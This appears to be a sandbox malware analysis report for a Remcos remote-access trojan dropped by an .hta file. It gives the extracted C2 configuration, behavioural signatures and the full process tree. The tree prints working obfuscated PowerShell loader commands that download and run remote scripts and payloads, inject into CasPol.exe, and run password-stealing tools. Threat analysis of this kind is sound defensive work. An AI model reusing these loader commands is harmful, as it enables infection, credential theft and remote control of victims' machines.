remcos | a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wegivenbestthngsforbestgirlfriendwhobestforentiretime.hta
Size

15KB
MD5

b6bca63d34e72f931db79e9b7af61d21
SHA1

b9bb3c1c502d31bd3fdb1841d312c2fa5bab4caf
SHA256

a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab
SHA512

acce0debf2b8dfa9bc06c1c317cc3491d61c7ca48607c614a95674454bc3a5fb8a1f8d898bb40d517272643af63aae3e06cedd76432cf2c8da6ab905c0c0d6ea
SSDEEP

48:3hMuVfhMLVfu4TArxprC+cAZSnRyxm6SMkMMf2M2VfmMTG:heFTArxVncWSWSjAo

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

216.9.226.100:3898

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
mic
mouse_option
false
mutex
Rmc-Q9T2QD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/5108-103-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/620-109-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2968-106-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2968-106-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/5108-103-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	2720	powershell.exe
17	4816	powershell.exe
18	4816	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2720	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4816	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4816 set thread context of 944	4816	powershell.exe	94
PID 944 set thread context of 5108	944	CasPol.exe	95
PID 944 set thread context of 2968	944	CasPol.exe	99
PID 944 set thread context of 620	944	CasPol.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2720	powershell.exe
2720	powershell.exe
4816	powershell.exe
4816	powershell.exe
5108	CasPol.exe
5108	CasPol.exe
620	CasPol.exe
620	CasPol.exe
5108	CasPol.exe
5108	CasPol.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
944	CasPol.exe
944	CasPol.exe
944	CasPol.exe
944	CasPol.exe
944	CasPol.exe
944	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	620	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
944	CasPol.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 692 wrote to memory of 2652	692	mshta.exe	86
PID 692 wrote to memory of 2652	692	mshta.exe	86
PID 692 wrote to memory of 2652	692	mshta.exe	86
PID 2652 wrote to memory of 2720	2652	cmd.exe	88
PID 2652 wrote to memory of 2720	2652	cmd.exe	88
PID 2652 wrote to memory of 2720	2652	cmd.exe	88
PID 2720 wrote to memory of 4468	2720	powershell.exe	89
PID 2720 wrote to memory of 4468	2720	powershell.exe	89
PID 2720 wrote to memory of 4468	2720	powershell.exe	89
PID 4468 wrote to memory of 1136	4468	csc.exe	90
PID 4468 wrote to memory of 1136	4468	csc.exe	90
PID 4468 wrote to memory of 1136	4468	csc.exe	90
PID 2720 wrote to memory of 2964	2720	powershell.exe	91
PID 2720 wrote to memory of 2964	2720	powershell.exe	91
PID 2720 wrote to memory of 2964	2720	powershell.exe	91
PID 2964 wrote to memory of 4816	2964	WScript.exe	92
PID 2964 wrote to memory of 4816	2964	WScript.exe	92
PID 2964 wrote to memory of 4816	2964	WScript.exe	92
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 4816 wrote to memory of 944	4816	powershell.exe	94
PID 944 wrote to memory of 5108	944	CasPol.exe	95
PID 944 wrote to memory of 5108	944	CasPol.exe	95
PID 944 wrote to memory of 5108	944	CasPol.exe	95
PID 944 wrote to memory of 5108	944	CasPol.exe	95
PID 944 wrote to memory of 3552	944	CasPol.exe	96
PID 944 wrote to memory of 3552	944	CasPol.exe	96
PID 944 wrote to memory of 3552	944	CasPol.exe	96
PID 944 wrote to memory of 3396	944	CasPol.exe	97
PID 944 wrote to memory of 3396	944	CasPol.exe	97
PID 944 wrote to memory of 3396	944	CasPol.exe	97
PID 944 wrote to memory of 3216	944	CasPol.exe	98
PID 944 wrote to memory of 3216	944	CasPol.exe	98
PID 944 wrote to memory of 3216	944	CasPol.exe	98
PID 944 wrote to memory of 2968	944	CasPol.exe	99
PID 944 wrote to memory of 2968	944	CasPol.exe	99
PID 944 wrote to memory of 2968	944	CasPol.exe	99
PID 944 wrote to memory of 2968	944	CasPol.exe	99
PID 944 wrote to memory of 620	944	CasPol.exe	100
PID 944 wrote to memory of 620	944	CasPol.exe	100
PID 944 wrote to memory of 620	944	CasPol.exe	100
PID 944 wrote to memory of 620	944	CasPol.exe	100

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wegivenbestthngsforbestgirlfriendwhobestforentiretime.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:692
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWerShELl -EX BYpASS -nop -W 1 -C DEVIcecREdEntIAlDePloYment.eXE ; INVOKe-eXPRESSIoN($(INvoKe-eXpreSsION('[SYSTEM.TEXt.ENCODiNg]'+[chaR]58+[CHaR]0X3A+'UTf8.getSTRiNg([sysTEM.CONVErT]'+[CHaR]58+[CHaR]0x3a+'frOmBASE64STRING('+[CHaR]34+'JE5nZUdPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJEZUZpTml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpreUYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGU3hxSGZWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCQVMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRaSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1BWICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROZ2VHT3U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNTUwL25pY2V3b3JraW5nc2tpbGxnaXZlbWViZXN0dGhpbmdzZm9yYm9vc3RiZXN0Zm9ybWVnaXZlbmJlc3RjaGFsbC5nSUYiLCIkRW5WOkFQUERBVEFcbmljZXdvcmtpbmdza2lsbGdpdmVtZWJlc3R0aGluZ3Nmb3Jib29zdGJlc3Rmb3JtZWdpdmVuYmVzdGMudmJzIiwwLDApO1NUQVJULVNsZWVQKDMpO0lOVk9LRS1lWFByZXNzSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNld29ya2luZ3NraWxsZ2l2ZW1lYmVzdHRoaW5nc2ZvcmJvb3N0YmVzdGZvcm1lZ2l2ZW5iZXN0Yy52YnMi'+[ChAr]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWerShELl -EX BYpASS -nop -W 1 -C DEVIcecREdEntIAlDePloYment.eXE ; INVOKe-eXPRESSIoN($(INvoKe-eXpreSsION('[SYSTEM.TEXt.ENCODiNg]'+[chaR]58+[CHaR]0X3A+'UTf8.getSTRiNg([sysTEM.CONVErT]'+[CHaR]58+[CHaR]0x3a+'frOmBASE64STRING('+[CHaR]34+'JE5nZUdPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJEZUZpTml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpreUYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGU3hxSGZWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCQVMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRaSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1BWICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROZ2VHT3U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNTUwL25pY2V3b3JraW5nc2tpbGxnaXZlbWViZXN0dGhpbmdzZm9yYm9vc3RiZXN0Zm9ybWVnaXZlbmJlc3RjaGFsbC5nSUYiLCIkRW5WOkFQUERBVEFcbmljZXdvcmtpbmdza2lsbGdpdmVtZWJlc3R0aGluZ3Nmb3Jib29zdGJlc3Rmb3JtZWdpdmVuYmVzdGMudmJzIiwwLDApO1NUQVJULVNsZWVQKDMpO0lOVk9LRS1lWFByZXNzSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNld29ya2luZ3NraWxsZ2l2ZW1lYmVzdHRoaW5nc2ZvcmJvb3N0YmVzdGZvcm1lZ2l2ZW5iZXN0Yy52YnMi'+[ChAr]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tefm1lqa\tefm1lqa.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4468
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4D2.tmp" "c:\Users\Admin\AppData\Local\Temp\tefm1lqa\CSC1C02C774475F413C80DBC183D3FFCBB6.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1136
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceworkingskillgivemebestthingsforboostbestformegivenbestc.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAZABvAG8AZwBwAHUAdAByAGEAdABzAHcAZQBuAHIAbwBmAHMAZwBuAGkAaAB0AHQAcwBlAGIAeQBtAGUAZQBzAC8AMAA1ADUALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADcANgA5ADYAMQA3ADEALwBoAGUAawBlADIAcABtAHQAZQB1AHcAOABzAHEAcwBwAGwAaABrAGwALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4816
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:944
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hkjpatnulfjefwcfanm"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rnxablxoznbjhkyjkyhoyi"
        7⤵
        
        PID:3552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rnxablxoznbjhkyjkyhoyi"
        7⤵
        
        PID:3396
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rnxablxoznbjhkyjkyhoyi"
        7⤵
        
        PID:3216
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rnxablxoznbjhkyjkyhoyi"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\bhcttdiqvwtwrqmvbjuqbvsbqw"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mic\logs.dat

Filesize
102B

MD5
b9c9696b28fba68299d9a0d57547ffbe

SHA1
ceb031067965d4c0e734c1c799d03a1ba8401184

SHA256
56e925717a519268d480871cd8a89458f4b0198db2884b129ff8a7a6b7f58e54

SHA512
7e8da56ce08fffc4c126234b68c3e3ce7e29bd507cb3a4802ec774d930b57b6a2e54a20220ec9b49303aaf66f3f8861acf18b371e4189a88398302fbd94e0f4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
769f4ba9d2b24414c5bc116c821ea8ab

SHA1
0bfb160d8f106de720fc94c7f7abdbf53fe1edd6

SHA256
b8d32bdafa07318629aacca0462382b646b3db93ea84be4d3e60fd2cb42bcb1b

SHA512
540d451c0eae594d2dba5f75d1e10cbb745ea949f2fd71a961941950e10295c8c81619bdb87cac066bf75ea1bcffe68ed57a7b5c08101436be74d176317ccea7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE4D2.tmp

Filesize
1KB

MD5
867758cc32083f201429b542b9bb181c

SHA1
540fe7d63abffa30de22e5170b4b8dffac7dfdb4

SHA256
a0207b95dd09bd6bbbcc5d8de63d7c010c15f2b92b67321e18b59941ec56af7b

SHA512
3af486aad1babcd0d94ad984352e2b86a65d18e6dbc22f9ebfecd276eb3e81bcf8041b482f637baddebe14e849d34697f84dd0574403bdbc19aba8486c50cd25

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hacjs0i.4tl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hkjpatnulfjefwcfanm

Filesize
4KB

MD5
37ba1b5afd377764e521857e1af16742

SHA1
238b7bac788b9a465ad2812cf49b783b9d169e7b

SHA256
1f5eb060861aacb6e13fca827470621fee91267ea2e28a9ceaa17c812b315a6e

SHA512
0ec22a52c398746db253b7cc1a80dd886f5da1498917c86a661bd01053b13edff0819a0e4effde8cbd1ed8d477a0baf0bb03f164007a9685d848cb29371d90c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tefm1lqa\tefm1lqa.dll

Filesize
3KB

MD5
8a6783783d1d0afce355615d7255271f

SHA1
f2a3b903fe89aa7160601f471fbf262b357e3f65

SHA256
99af628a4826fbe44518d1effccd48766c73acea19440a74cc467daa254ec28b

SHA512
4357934c3c46c6172e716bafd888ef3957e46e75cf0a552dd42f7105e2136f159ae9f18dd42426ab486b2f3e2e58ed49a487edc7b3245146bef1eaed37082f94

Download Submit
C:\Users\Admin\AppData\Roaming\niceworkingskillgivemebestthingsforboostbestformegivenbestc.vbs

Filesize
223KB

MD5
0f3025d4d5a84125b6976beadc384ba6

SHA1
00f8ef347fac607094499a75102a0f330bd61ae1

SHA256
ecbd9b07289801b665dbd8822fe23248e816033fe5791f227f81b13f01645182

SHA512
3528872018fd7b511d93bfb0a82043c45b076b7bc197a1b66e42d76d775a032875640793494491f8c609aa6c0410c32f88fa0b2f339bd59ed166eed0c77cb211

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tefm1lqa\CSC1C02C774475F413C80DBC183D3FFCBB6.TMP

Filesize
652B

MD5
74599549d7c92365f66850fb07336604

SHA1
c86f70a967684b5f38b1644d4839360f7c51b0d5

SHA256
4c9387a08c2e436b59a39d561f65e24dc40fee2cf2fe73edc001d24263d7833d

SHA512
f7cc7fc933bdb6325d8ccd6945c7fc8418a91b67836920c3ff7847e17a3b50d85e541739e1ee76dce8b88559a089d7d5f7da8af7ba611481b14c0623f3597440

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tefm1lqa\tefm1lqa.0.cs

Filesize
455B

MD5
d8cdd711e8e78d09c6cc1ab48e24dd50

SHA1
5cb77a53a82f93db5edd021d706f986dd504005a

SHA256
c2c29865844c4fea1dcecd5de4489dbb084ddda0720ecd40cf1bfc76f50c37f8

SHA512
66814498882b10126c2d5abdf4b223c4d37a2432b1d315dbcde5a65cb7f121f36be0a57a40467ab8b43f800f13a0dd7038002f09fa09e83183cde110296e4635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tefm1lqa\tefm1lqa.cmdline

Filesize
369B

MD5
